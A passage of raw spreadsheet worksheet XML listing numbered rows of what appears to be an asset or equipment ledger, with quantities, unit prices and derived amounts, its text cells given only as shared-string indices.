      <c r="E65" s="238" t="s">
        <v>2089</v>
      </c>
      <c r="F65" s="11"/>
      <c r="G65" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H65" s="11">
        <v>2</v>
      </c>
      <c r="I65" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J65" s="192">
        <v>25000</v>
      </c>
      <c r="K65" s="188">
        <v>1000</v>
      </c>
      <c r="L65" s="246" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="66" customHeight="1" spans="2:12">
      <c r="B66" s="16">
        <v>51</v>
      </c>
      <c r="C66" s="237" t="s">
        <v>2090</v>
      </c>
      <c r="D66" s="238" t="s">
        <v>1987</v>
      </c>
      <c r="E66" s="238" t="s">
        <v>2091</v>
      </c>
      <c r="F66" s="11"/>
      <c r="G66" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H66" s="11">
        <v>2</v>
      </c>
      <c r="I66" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J66" s="192">
        <v>5040</v>
      </c>
      <c r="K66" s="188">
        <v>201.6</v>
      </c>
      <c r="L66" s="246" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="67" customHeight="1" spans="2:12">
      <c r="B67" s="16">
        <v>52</v>
      </c>
      <c r="C67" s="237" t="s">
        <v>2092</v>
      </c>
      <c r="D67" s="238" t="s">
        <v>1990</v>
      </c>
      <c r="E67" s="238" t="s">
        <v>2093</v>
      </c>
      <c r="F67" s="11"/>
      <c r="G67" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H67" s="11">
        <v>2</v>
      </c>
      <c r="I67" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J67" s="192">
        <v>15000</v>
      </c>
      <c r="K67" s="188">
        <v>400</v>
      </c>
      <c r="L67" s="246" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="68" customHeight="1" spans="2:12">
      <c r="B68" s="16">
        <v>53</v>
      </c>
      <c r="C68" s="237" t="s">
        <v>2094</v>
      </c>
      <c r="D68" s="238" t="s">
        <v>2079</v>
      </c>
      <c r="E68" s="238" t="s">
        <v>2095</v>
      </c>
      <c r="F68" s="11"/>
      <c r="G68" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H68" s="11">
        <v>1</v>
      </c>
      <c r="I68" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J68" s="192">
        <v>2500</v>
      </c>
      <c r="K68" s="188">
        <v>100</v>
      </c>
      <c r="L68" s="246" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="69" customHeight="1" spans="2:12">
      <c r="B69" s="16">
        <v>54</v>
      </c>
      <c r="C69" s="237" t="s">
        <v>2096</v>
      </c>
      <c r="D69" s="238" t="s">
        <v>2097</v>
      </c>
      <c r="E69" s="238" t="s">
        <v>2098</v>
      </c>
      <c r="F69" s="11"/>
      <c r="G69" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H69" s="11">
        <v>1</v>
      </c>
      <c r="I69" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J69" s="192">
        <v>15000</v>
      </c>
      <c r="K69" s="188">
        <v>600</v>
      </c>
      <c r="L69" s="246" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="70" customHeight="1" spans="2:12">
      <c r="B70" s="16">
        <v>55</v>
      </c>
      <c r="C70" s="237" t="s">
        <v>2099</v>
      </c>
      <c r="D70" s="238" t="s">
        <v>2100</v>
      </c>
      <c r="E70" s="238" t="s">
        <v>2101</v>
      </c>
      <c r="F70" s="11"/>
      <c r="G70" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H70" s="11">
        <v>1</v>
      </c>
      <c r="I70" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J70" s="190">
        <v>430</v>
      </c>
      <c r="K70" s="188">
        <v>17.2</v>
      </c>
      <c r="L70" s="246" t="s">
        <v>1328</v>
      </c>
    </row>
    <row r="71" customHeight="1" spans="2:12">
      <c r="B71" s="16">
        <v>56</v>
      </c>
      <c r="C71" s="237" t="s">
        <v>2102</v>
      </c>
      <c r="D71" s="238" t="s">
        <v>2103</v>
      </c>
      <c r="E71" s="238" t="s">
        <v>2104</v>
      </c>
      <c r="F71" s="11"/>
      <c r="G71" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H71" s="11">
        <v>1</v>
      </c>
      <c r="I71" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J71" s="192">
        <v>1350</v>
      </c>
      <c r="K71" s="188">
        <v>54</v>
      </c>
      <c r="L71" s="246" t="s">
        <v>1328</v>
      </c>
    </row>
    <row r="72" customHeight="1" spans="2:12">
      <c r="B72" s="16">
        <v>57</v>
      </c>
      <c r="C72" s="237" t="s">
        <v>2105</v>
      </c>
      <c r="D72" s="238" t="s">
        <v>2068</v>
      </c>
      <c r="E72" s="238" t="s">
        <v>2069</v>
      </c>
      <c r="F72" s="11"/>
      <c r="G72" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H72" s="11">
        <v>8</v>
      </c>
      <c r="I72" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J72" s="192">
        <v>2200</v>
      </c>
      <c r="K72" s="188">
        <v>224</v>
      </c>
      <c r="L72" s="246" t="s">
        <v>1574</v>
      </c>
    </row>
    <row r="73" customHeight="1" spans="2:12">
      <c r="B73" s="16">
        <v>58</v>
      </c>
      <c r="C73" s="16"/>
      <c r="D73" s="10" t="s">
        <v>2065</v>
      </c>
      <c r="E73" s="10"/>
      <c r="F73" s="11"/>
      <c r="G73" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H73" s="11">
        <v>1</v>
      </c>
      <c r="I73" s="11">
        <v>2014</v>
      </c>
      <c r="J73" s="190"/>
      <c r="K73" s="188">
        <v>9600</v>
      </c>
      <c r="L73" s="239" t="s">
        <v>1574</v>
      </c>
    </row>
    <row r="74" customHeight="1" spans="2:12">
      <c r="B74" s="16">
        <v>59</v>
      </c>
      <c r="C74" s="16"/>
      <c r="D74" s="10" t="s">
        <v>2106</v>
      </c>
      <c r="E74" s="10"/>
      <c r="F74" s="11"/>
      <c r="G74" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H74" s="11">
        <v>1</v>
      </c>
      <c r="I74" s="11">
        <v>2003</v>
      </c>
      <c r="J74" s="190"/>
      <c r="K74" s="188">
        <v>600</v>
      </c>
      <c r="L74" s="239" t="s">
        <v>1574</v>
      </c>
    </row>
    <row r="75" customHeight="1" spans="2:12">
      <c r="B75" s="16">
        <v>60</v>
      </c>
      <c r="C75" s="237" t="s">
        <v>2107</v>
      </c>
      <c r="D75" s="238" t="s">
        <v>2071</v>
      </c>
      <c r="E75" s="238" t="s">
        <v>2069</v>
      </c>
      <c r="F75" s="11"/>
      <c r="G75" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H75" s="11">
        <v>2</v>
      </c>
      <c r="I75" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J75" s="192">
        <v>1470</v>
      </c>
      <c r="K75" s="188">
        <v>58.8</v>
      </c>
      <c r="L75" s="246" t="s">
        <v>1574</v>
      </c>
    </row>
    <row r="76" customHeight="1" spans="2:12">
      <c r="B76" s="16">
        <v>61</v>
      </c>
      <c r="C76" s="237" t="s">
        <v>2108</v>
      </c>
      <c r="D76" s="238" t="s">
        <v>2063</v>
      </c>
      <c r="E76" s="238" t="s">
        <v>2109</v>
      </c>
      <c r="F76" s="11"/>
      <c r="G76" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H76" s="11">
        <v>4</v>
      </c>
      <c r="I76" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J76" s="192">
        <v>3200</v>
      </c>
      <c r="K76" s="188">
        <v>128</v>
      </c>
      <c r="L76" s="246" t="s">
        <v>1574</v>
      </c>
    </row>
    <row r="77" customHeight="1" spans="2:12">
      <c r="B77" s="16">
        <v>62</v>
      </c>
      <c r="C77" s="237" t="s">
        <v>2110</v>
      </c>
      <c r="D77" s="238" t="s">
        <v>2111</v>
      </c>
      <c r="E77" s="238" t="s">
        <v>2112</v>
      </c>
      <c r="F77" s="11"/>
      <c r="G77" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H77" s="11">
        <v>1</v>
      </c>
      <c r="I77" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J77" s="192">
        <v>4800</v>
      </c>
      <c r="K77" s="188">
        <v>192</v>
      </c>
      <c r="L77" s="246" t="s">
        <v>2113</v>
      </c>
    </row>
    <row r="78" customHeight="1" spans="2:12">
      <c r="B78" s="16">
        <v>63</v>
      </c>
      <c r="C78" s="237" t="s">
        <v>2114</v>
      </c>
      <c r="D78" s="238" t="s">
        <v>2034</v>
      </c>
      <c r="E78" s="238" t="s">
        <v>2115</v>
      </c>
      <c r="F78" s="16"/>
      <c r="G78" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H78" s="11">
        <v>1</v>
      </c>
      <c r="I78" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J78" s="192">
        <v>3700</v>
      </c>
      <c r="K78" s="188">
        <v>0</v>
      </c>
      <c r="L78" s="239" t="s">
        <v>2113</v>
      </c>
    </row>
    <row r="79" customHeight="1" spans="2:12">
      <c r="B79" s="16">
        <v>64</v>
      </c>
      <c r="C79" s="237" t="s">
        <v>2116</v>
      </c>
      <c r="D79" s="238" t="s">
        <v>2011</v>
      </c>
      <c r="E79" s="238" t="s">
        <v>2117</v>
      </c>
      <c r="F79" s="16"/>
      <c r="G79" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H79" s="11">
        <v>5</v>
      </c>
      <c r="I79" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J79" s="192">
        <v>37000</v>
      </c>
      <c r="K79" s="188">
        <v>0</v>
      </c>
      <c r="L79" s="239" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="80" customHeight="1" spans="2:12">
      <c r="B80" s="16">
        <v>65</v>
      </c>
      <c r="C80" s="237" t="s">
        <v>2119</v>
      </c>
      <c r="D80" s="238" t="s">
        <v>2011</v>
      </c>
      <c r="E80" s="238" t="s">
        <v>2120</v>
      </c>
      <c r="F80" s="16"/>
      <c r="G80" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H80" s="11">
        <v>2</v>
      </c>
      <c r="I80" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J80" s="192">
        <v>6000</v>
      </c>
      <c r="K80" s="188">
        <v>0</v>
      </c>
      <c r="L80" s="239" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="81" customHeight="1" spans="2:12">
      <c r="B81" s="16">
        <v>66</v>
      </c>
      <c r="C81" s="237" t="s">
        <v>2121</v>
      </c>
      <c r="D81" s="238" t="s">
        <v>2122</v>
      </c>
      <c r="E81" s="238" t="s">
        <v>2123</v>
      </c>
      <c r="F81" s="16"/>
      <c r="G81" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H81" s="11"/>
      <c r="I81" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J81" s="192">
        <v>6600</v>
      </c>
      <c r="K81" s="188">
        <v>0</v>
      </c>
      <c r="L81" s="239" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="82" customHeight="1" spans="2:12">
      <c r="B82" s="16">
        <v>67</v>
      </c>
      <c r="C82" s="16"/>
      <c r="D82" s="10" t="s">
        <v>2124</v>
      </c>
      <c r="E82" s="10"/>
      <c r="F82" s="11"/>
      <c r="G82" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H82" s="11">
        <v>2</v>
      </c>
      <c r="I82" s="11"/>
      <c r="J82" s="190"/>
      <c r="K82" s="188">
        <v>480</v>
      </c>
      <c r="L82" s="246" t="s">
        <v>2113</v>
      </c>
    </row>
    <row r="83" customHeight="1" spans="2:12">
      <c r="B83" s="16">
        <v>68</v>
      </c>
      <c r="C83" s="16"/>
      <c r="D83" s="10" t="s">
        <v>2071</v>
      </c>
      <c r="E83" s="10"/>
      <c r="F83" s="11"/>
      <c r="G83" s="16" t="s">
        <v>2125</v>
      </c>
      <c r="H83" s="11">
        <v>5</v>
      </c>
      <c r="I83" s="11"/>
      <c r="J83" s="190"/>
      <c r="K83" s="188">
        <v>400</v>
      </c>
      <c r="L83" s="246" t="s">
        <v>2113</v>
      </c>
    </row>
    <row r="84" customHeight="1" spans="2:12">
      <c r="B84" s="16">
        <v>69</v>
      </c>
      <c r="C84" s="16"/>
      <c r="D84" s="10" t="s">
        <v>2126</v>
      </c>
      <c r="E84" s="10"/>
      <c r="F84" s="11"/>
      <c r="G84" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H84" s="11">
        <v>1</v>
      </c>
      <c r="I84" s="11"/>
      <c r="J84" s="190"/>
      <c r="K84" s="188">
        <v>200</v>
      </c>
      <c r="L84" s="246" t="s">
        <v>2113</v>
      </c>
    </row>
    <row r="85" customHeight="1" spans="2:12">
      <c r="B85" s="16">
        <v>70</v>
      </c>
      <c r="C85" s="16"/>
      <c r="D85" s="10" t="s">
        <v>2127</v>
      </c>
      <c r="E85" s="10"/>
      <c r="F85" s="11"/>
      <c r="G85" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H85" s="11">
        <v>3</v>
      </c>
      <c r="I85" s="11"/>
      <c r="J85" s="190"/>
      <c r="K85" s="188">
        <v>600</v>
      </c>
      <c r="L85" s="246" t="s">
        <v>2113</v>
      </c>
    </row>
    <row r="86" customHeight="1" spans="2:12">
      <c r="B86" s="16">
        <v>71</v>
      </c>
      <c r="C86" s="237" t="s">
        <v>2128</v>
      </c>
      <c r="D86" s="238" t="s">
        <v>2057</v>
      </c>
      <c r="E86" s="238" t="s">
        <v>2129</v>
      </c>
      <c r="F86" s="11"/>
      <c r="G86" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H86" s="11">
        <v>3</v>
      </c>
      <c r="I86" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J86" s="192">
        <v>33000</v>
      </c>
      <c r="K86" s="188">
        <v>1320</v>
      </c>
      <c r="L86" s="246" t="s">
        <v>2130</v>
      </c>
    </row>
    <row r="87" customHeight="1" spans="2:12">
      <c r="B87" s="16">
        <v>72</v>
      </c>
      <c r="C87" s="237" t="s">
        <v>2131</v>
      </c>
      <c r="D87" s="238" t="s">
        <v>2132</v>
      </c>
      <c r="E87" s="10"/>
      <c r="F87" s="11"/>
      <c r="G87" s="16" t="s">
        <v>592</v>
      </c>
      <c r="H87" s="11">
        <v>1</v>
      </c>
      <c r="I87" s="237" t="s">
        <v>310</v>
      </c>
      <c r="J87" s="192">
        <v>280000</v>
      </c>
      <c r="K87" s="188">
        <v>11200</v>
      </c>
      <c r="L87" s="246" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="88" customHeight="1" spans="2:12">
      <c r="B88" s="16"/>
      <c r="C88" s="11"/>
      <c r="D88" s="10" t="s">
        <v>2133</v>
      </c>
      <c r="E88" s="10"/>
      <c r="F88" s="11"/>
      <c r="G88" s="16"/>
      <c r="H88" s="11"/>
      <c r="I88" s="11"/>
      <c r="J88" s="190"/>
      <c r="K88" s="188">
        <v>0</v>
      </c>
      <c r="L88" s="191"/>
    </row>
    <row r="89" customHeight="1" spans="2:12">
      <c r="B89" s="16"/>
      <c r="C89" s="11"/>
      <c r="D89" s="16" t="s">
        <v>2124</v>
      </c>
      <c r="E89" s="16" t="s">
        <v>2134</v>
      </c>
      <c r="F89" s="16" t="s">
        <v>2135</v>
      </c>
      <c r="G89" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H89" s="16">
        <v>1</v>
      </c>
      <c r="I89" s="11"/>
      <c r="J89" s="190"/>
      <c r="K89" s="188">
        <v>0</v>
      </c>
      <c r="L89" s="246" t="s">
        <v>2130</v>
      </c>
    </row>
    <row r="90" customHeight="1" spans="2:12">
      <c r="B90" s="16"/>
      <c r="C90" s="11"/>
      <c r="D90" s="16" t="s">
        <v>2009</v>
      </c>
      <c r="E90" s="10"/>
      <c r="F90" s="16" t="s">
        <v>2136</v>
      </c>
      <c r="G90" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H90" s="16">
        <v>4</v>
      </c>
      <c r="I90" s="11"/>
      <c r="J90" s="190"/>
      <c r="K90" s="188">
        <v>0</v>
      </c>
      <c r="L90" s="246" t="s">
        <v>2130</v>
      </c>
    </row>
    <row r="91" customHeight="1" spans="2:12">
      <c r="B91" s="16"/>
      <c r="C91" s="11"/>
      <c r="D91" s="16" t="s">
        <v>2011</v>
      </c>
      <c r="E91" s="10"/>
      <c r="F91" s="16" t="s">
        <v>2137</v>
      </c>
      <c r="G91" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H91" s="16">
        <v>5</v>
      </c>
      <c r="I91" s="11"/>
      <c r="J91" s="190"/>
      <c r="K91" s="188">
        <v>0</v>
      </c>
      <c r="L91" s="246" t="s">
        <v>2130</v>
      </c>
    </row>
    <row r="92" customHeight="1" spans="2:12">
      <c r="B92" s="16"/>
      <c r="C92" s="11"/>
      <c r="D92" s="16" t="s">
        <v>2138</v>
      </c>
      <c r="E92" s="10"/>
      <c r="F92" s="16" t="s">
        <v>2139</v>
      </c>
      <c r="G92" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H92" s="16">
        <v>1</v>
      </c>
      <c r="I92" s="11"/>
      <c r="J92" s="190"/>
      <c r="K92" s="188">
        <v>0</v>
      </c>
      <c r="L92" s="246" t="s">
        <v>2130</v>
      </c>
    </row>
    <row r="93" customHeight="1" spans="2:12">
      <c r="B93" s="16"/>
      <c r="C93" s="11"/>
      <c r="D93" s="16" t="s">
        <v>2140</v>
      </c>
      <c r="E93" s="16" t="s">
        <v>2141</v>
      </c>
      <c r="F93" s="16" t="s">
        <v>2142</v>
      </c>
      <c r="G93" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H93" s="16">
        <v>2</v>
      </c>
      <c r="I93" s="11"/>
      <c r="J93" s="190"/>
      <c r="K93" s="188">
        <v>0</v>
      </c>
      <c r="L93" s="246" t="s">
        <v>2130</v>
      </c>
    </row>
    <row r="94" customHeight="1" spans="2:12">
      <c r="B94" s="16"/>
      <c r="C94" s="11"/>
      <c r="D94" s="16" t="s">
        <v>1962</v>
      </c>
      <c r="E94" s="10"/>
      <c r="F94" s="16" t="s">
        <v>2143</v>
      </c>
      <c r="G94" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H94" s="16">
        <v>2</v>
      </c>
      <c r="I94" s="11"/>
      <c r="J94" s="190"/>
      <c r="K94" s="188">
        <v>0</v>
      </c>
      <c r="L94" s="246" t="s">
        <v>2130</v>
      </c>
    </row>
    <row r="95" customHeight="1" spans="2:12">
      <c r="B95" s="16"/>
      <c r="C95" s="11"/>
      <c r="D95" s="16" t="s">
        <v>1965</v>
      </c>
      <c r="E95" s="10"/>
      <c r="F95" s="16" t="s">
        <v>2144</v>
      </c>
      <c r="G95" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H95" s="16">
        <v>1</v>
      </c>
      <c r="I95" s="11"/>
      <c r="J95" s="190"/>
      <c r="K95" s="188">
        <v>0</v>
      </c>
      <c r="L95" s="246" t="s">
        <v>2130</v>
      </c>
    </row>
    <row r="96" customHeight="1" spans="2:12">
      <c r="B96" s="16"/>
      <c r="C96" s="11"/>
      <c r="D96" s="16" t="s">
        <v>2025</v>
      </c>
      <c r="E96" s="16" t="s">
        <v>2145</v>
      </c>
      <c r="F96" s="16" t="s">
        <v>2146</v>
      </c>
      <c r="G96" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H96" s="16">
        <v>1</v>
      </c>
      <c r="I96" s="11"/>
      <c r="J96" s="190"/>
      <c r="K96" s="188">
        <v>0</v>
      </c>
      <c r="L96" s="246" t="s">
        <v>2130</v>
      </c>
    </row>
    <row r="97" customHeight="1" spans="2:12">
      <c r="B97" s="16"/>
      <c r="C97" s="11"/>
      <c r="D97" s="16" t="s">
        <v>2147</v>
      </c>
      <c r="E97" s="16" t="s">
        <v>2148</v>
      </c>
      <c r="F97" s="16" t="s">
        <v>2135</v>
      </c>
      <c r="G97" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H97" s="16">
        <v>4</v>
      </c>
      <c r="I97" s="11"/>
      <c r="J97" s="190"/>
      <c r="K97" s="188">
        <v>0</v>
      </c>
      <c r="L97" s="246" t="s">
        <v>2130</v>
      </c>
    </row>
    <row r="98" customHeight="1" spans="2:12">
      <c r="B98" s="16">
        <v>43</v>
      </c>
      <c r="C98" s="237" t="s">
        <v>2149</v>
      </c>
      <c r="D98" s="10" t="s">
        <v>2150</v>
      </c>
      <c r="E98" s="238" t="s">
        <v>2151</v>
      </c>
      <c r="F98" s="11"/>
      <c r="G98" s="16" t="s">
        <v>592</v>
      </c>
      <c r="H98" s="11">
        <v>1</v>
      </c>
      <c r="I98" s="237" t="s">
        <v>2152</v>
      </c>
      <c r="J98" s="192">
        <v>733912</v>
      </c>
      <c r="K98" s="188">
        <v>29356</v>
      </c>
      <c r="L98" s="246" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="99" customHeight="1" spans="2:12">
      <c r="B99" s="16"/>
      <c r="C99" s="11"/>
      <c r="D99" s="10" t="s">
        <v>2133</v>
      </c>
      <c r="E99" s="10"/>
      <c r="F99" s="11"/>
      <c r="G99" s="16"/>
      <c r="H99" s="11"/>
      <c r="I99" s="11"/>
      <c r="J99" s="190"/>
      <c r="K99" s="188">
        <v>0</v>
      </c>
      <c r="L99" s="191"/>
    </row>
    <row r="100" customHeight="1" spans="2:12">
      <c r="B100" s="16"/>
      <c r="C100" s="11"/>
      <c r="D100" s="16" t="s">
        <v>2066</v>
      </c>
      <c r="E100" s="10"/>
      <c r="F100" s="16" t="s">
        <v>2153</v>
      </c>
      <c r="G100" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H100" s="16">
        <v>1</v>
      </c>
      <c r="I100" s="11"/>
      <c r="J100" s="190"/>
      <c r="K100" s="188">
        <v>0</v>
      </c>
      <c r="L100" s="191" t="s">
        <v>2154</v>
      </c>
    </row>
    <row r="101" customHeight="1" spans="2:12">
      <c r="B101" s="16"/>
      <c r="C101" s="11"/>
      <c r="D101" s="16" t="s">
        <v>2009</v>
      </c>
      <c r="E101" s="10"/>
      <c r="F101" s="16" t="s">
        <v>2135</v>
      </c>
      <c r="G101" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H101" s="16">
        <v>7</v>
      </c>
      <c r="I101" s="11"/>
      <c r="J101" s="190"/>
      <c r="K101" s="188">
        <v>0</v>
      </c>
      <c r="L101" s="191" t="s">
        <v>2154</v>
      </c>
    </row>
    <row r="102" customHeight="1" spans="2:12">
      <c r="B102" s="16"/>
      <c r="C102" s="11"/>
      <c r="D102" s="16" t="s">
        <v>2155</v>
      </c>
      <c r="E102" s="10"/>
      <c r="F102" s="16" t="s">
        <v>2135</v>
      </c>
      <c r="G102" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H102" s="16">
        <v>2</v>
      </c>
      <c r="I102" s="11"/>
      <c r="J102" s="190"/>
      <c r="K102" s="188">
        <v>0</v>
      </c>
      <c r="L102" s="191" t="s">
        <v>2154</v>
      </c>
    </row>
    <row r="103" customHeight="1" spans="2:12">
      <c r="B103" s="16"/>
      <c r="C103" s="11"/>
      <c r="D103" s="16" t="s">
        <v>2013</v>
      </c>
      <c r="E103" s="10"/>
      <c r="F103" s="16" t="s">
        <v>2156</v>
      </c>
      <c r="G103" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H103" s="16">
        <v>2</v>
      </c>
      <c r="I103" s="11"/>
      <c r="J103" s="190"/>
      <c r="K103" s="188">
        <v>0</v>
      </c>
      <c r="L103" s="191" t="s">
        <v>2154</v>
      </c>
    </row>
    <row r="104" customHeight="1" spans="2:12">
      <c r="B104" s="16"/>
      <c r="C104" s="182"/>
      <c r="D104" s="180" t="s">
        <v>2011</v>
      </c>
      <c r="E104" s="181"/>
      <c r="F104" s="180" t="s">
        <v>1263</v>
      </c>
      <c r="G104" s="180" t="s">
        <v>507</v>
      </c>
      <c r="H104" s="180">
        <v>3</v>
      </c>
      <c r="I104" s="182"/>
      <c r="J104" s="193"/>
      <c r="K104" s="188">
        <v>0</v>
      </c>
      <c r="L104" s="191" t="s">
        <v>2154</v>
      </c>
    </row>
    <row r="105" customHeight="1" spans="2:12">
      <c r="B105" s="16">
        <v>75</v>
      </c>
      <c r="C105" s="237" t="s">
        <v>2157</v>
      </c>
      <c r="D105" s="10" t="s">
        <v>2158</v>
      </c>
      <c r="E105" s="238" t="s">
        <v>1999</v>
      </c>
      <c r="F105" s="11"/>
      <c r="G105" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H105" s="11">
        <v>1</v>
      </c>
      <c r="I105" s="237" t="s">
        <v>1461</v>
      </c>
      <c r="J105" s="192">
        <v>440000</v>
      </c>
      <c r="K105" s="188">
        <v>17600</v>
      </c>
      <c r="L105" s="246" t="s">
        <v>2159</v>
      </c>
    </row>
    <row r="106" customHeight="1" spans="2:12">
      <c r="B106" s="16"/>
      <c r="C106" s="11"/>
      <c r="D106" s="10" t="s">
        <v>2133</v>
      </c>
      <c r="E106" s="10"/>
      <c r="F106" s="11"/>
      <c r="G106" s="16"/>
      <c r="H106" s="11"/>
      <c r="I106" s="11"/>
      <c r="J106" s="190"/>
      <c r="K106" s="188">
        <v>0</v>
      </c>
      <c r="L106" s="191"/>
    </row>
    <row r="107" customHeight="1" spans="2:12">
      <c r="B107" s="16"/>
      <c r="C107" s="11"/>
      <c r="D107" s="10" t="s">
        <v>2009</v>
      </c>
      <c r="E107" s="10"/>
      <c r="F107" s="11" t="s">
        <v>2160</v>
      </c>
      <c r="G107" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H107" s="11">
        <v>9</v>
      </c>
      <c r="I107" s="11"/>
      <c r="J107" s="190"/>
      <c r="K107" s="188">
        <v>0</v>
      </c>
      <c r="L107" s="246" t="s">
        <v>2159</v>
      </c>
    </row>
    <row r="108" customHeight="1" spans="2:12">
      <c r="B108" s="16"/>
      <c r="C108" s="11"/>
      <c r="D108" s="10" t="s">
        <v>2127</v>
      </c>
      <c r="E108" s="10"/>
      <c r="F108" s="11" t="s">
        <v>2018</v>
      </c>
      <c r="G108" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H108" s="11">
        <v>5</v>
      </c>
      <c r="I108" s="11"/>
      <c r="J108" s="190"/>
      <c r="K108" s="188">
        <v>0</v>
      </c>
      <c r="L108" s="246" t="s">
        <v>2159</v>
      </c>
    </row>
    <row r="109" customHeight="1" spans="2:12">
      <c r="B109" s="16"/>
      <c r="C109" s="11"/>
      <c r="D109" s="10" t="s">
        <v>2028</v>
      </c>
      <c r="E109" s="10"/>
      <c r="F109" s="11" t="s">
        <v>2160</v>
      </c>
      <c r="G109" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H109" s="11">
        <v>1</v>
      </c>
      <c r="I109" s="11"/>
      <c r="J109" s="190"/>
      <c r="K109" s="188">
        <v>0</v>
      </c>
      <c r="L109" s="246" t="s">
        <v>2159</v>
      </c>
    </row>
    <row r="110" customHeight="1" spans="2:12">
      <c r="B110" s="16"/>
      <c r="C110" s="11"/>
      <c r="D110" s="10" t="s">
        <v>2011</v>
      </c>
      <c r="E110" s="10"/>
      <c r="F110" s="11" t="s">
        <v>1263</v>
      </c>
      <c r="G110" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H110" s="11">
        <v>3</v>
      </c>
      <c r="I110" s="11"/>
      <c r="J110" s="190"/>
      <c r="K110" s="188">
        <v>0</v>
      </c>
      <c r="L110" s="246" t="s">
        <v>2159</v>
      </c>
    </row>
    <row r="111" customHeight="1" spans="2:12">
      <c r="B111" s="16"/>
      <c r="C111" s="11"/>
      <c r="D111" s="10" t="s">
        <v>2161</v>
      </c>
      <c r="E111" s="10"/>
      <c r="F111" s="11" t="s">
        <v>1263</v>
      </c>
      <c r="G111" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H111" s="11">
        <v>2</v>
      </c>
      <c r="I111" s="11"/>
      <c r="J111" s="190"/>
      <c r="K111" s="188">
        <v>0</v>
      </c>
      <c r="L111" s="246" t="s">
        <v>2159</v>
      </c>
    </row>
    <row r="112" customHeight="1" spans="2:12">
      <c r="B112" s="16">
        <v>74</v>
      </c>
      <c r="C112" s="237" t="s">
        <v>2162</v>
      </c>
      <c r="D112" s="238" t="s">
        <v>2057</v>
      </c>
      <c r="E112" s="238" t="s">
        <v>2112</v>
      </c>
      <c r="F112" s="180"/>
      <c r="G112" s="180"/>
      <c r="H112" s="11">
        <v>1</v>
      </c>
      <c r="I112" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J112" s="192">
        <v>5000</v>
      </c>
      <c r="K112" s="188">
        <v>0</v>
      </c>
      <c r="L112" s="239" t="s">
        <v>1628</v>
      </c>
    </row>
    <row r="113" customHeight="1" spans="2:12">
      <c r="B113" s="16">
        <v>75</v>
      </c>
      <c r="C113" s="237" t="s">
        <v>2163</v>
      </c>
      <c r="D113" s="238" t="s">
        <v>2164</v>
      </c>
      <c r="E113" s="238" t="s">
        <v>2165</v>
      </c>
      <c r="F113" s="11"/>
      <c r="G113" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H113" s="11">
        <v>1</v>
      </c>
      <c r="I113" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J113" s="192">
        <v>6000</v>
      </c>
      <c r="K113" s="188">
        <v>240</v>
      </c>
      <c r="L113" s="246" t="s">
        <v>1628</v>
      </c>
    </row>
    <row r="114" customHeight="1" spans="2:12">
      <c r="B114" s="16">
        <v>76</v>
      </c>
      <c r="C114" s="16"/>
      <c r="D114" s="10" t="s">
        <v>2166</v>
      </c>
      <c r="E114" s="10" t="s">
        <v>2167</v>
      </c>
      <c r="F114" s="11"/>
      <c r="G114" s="16" t="s">
        <v>223</v>
      </c>
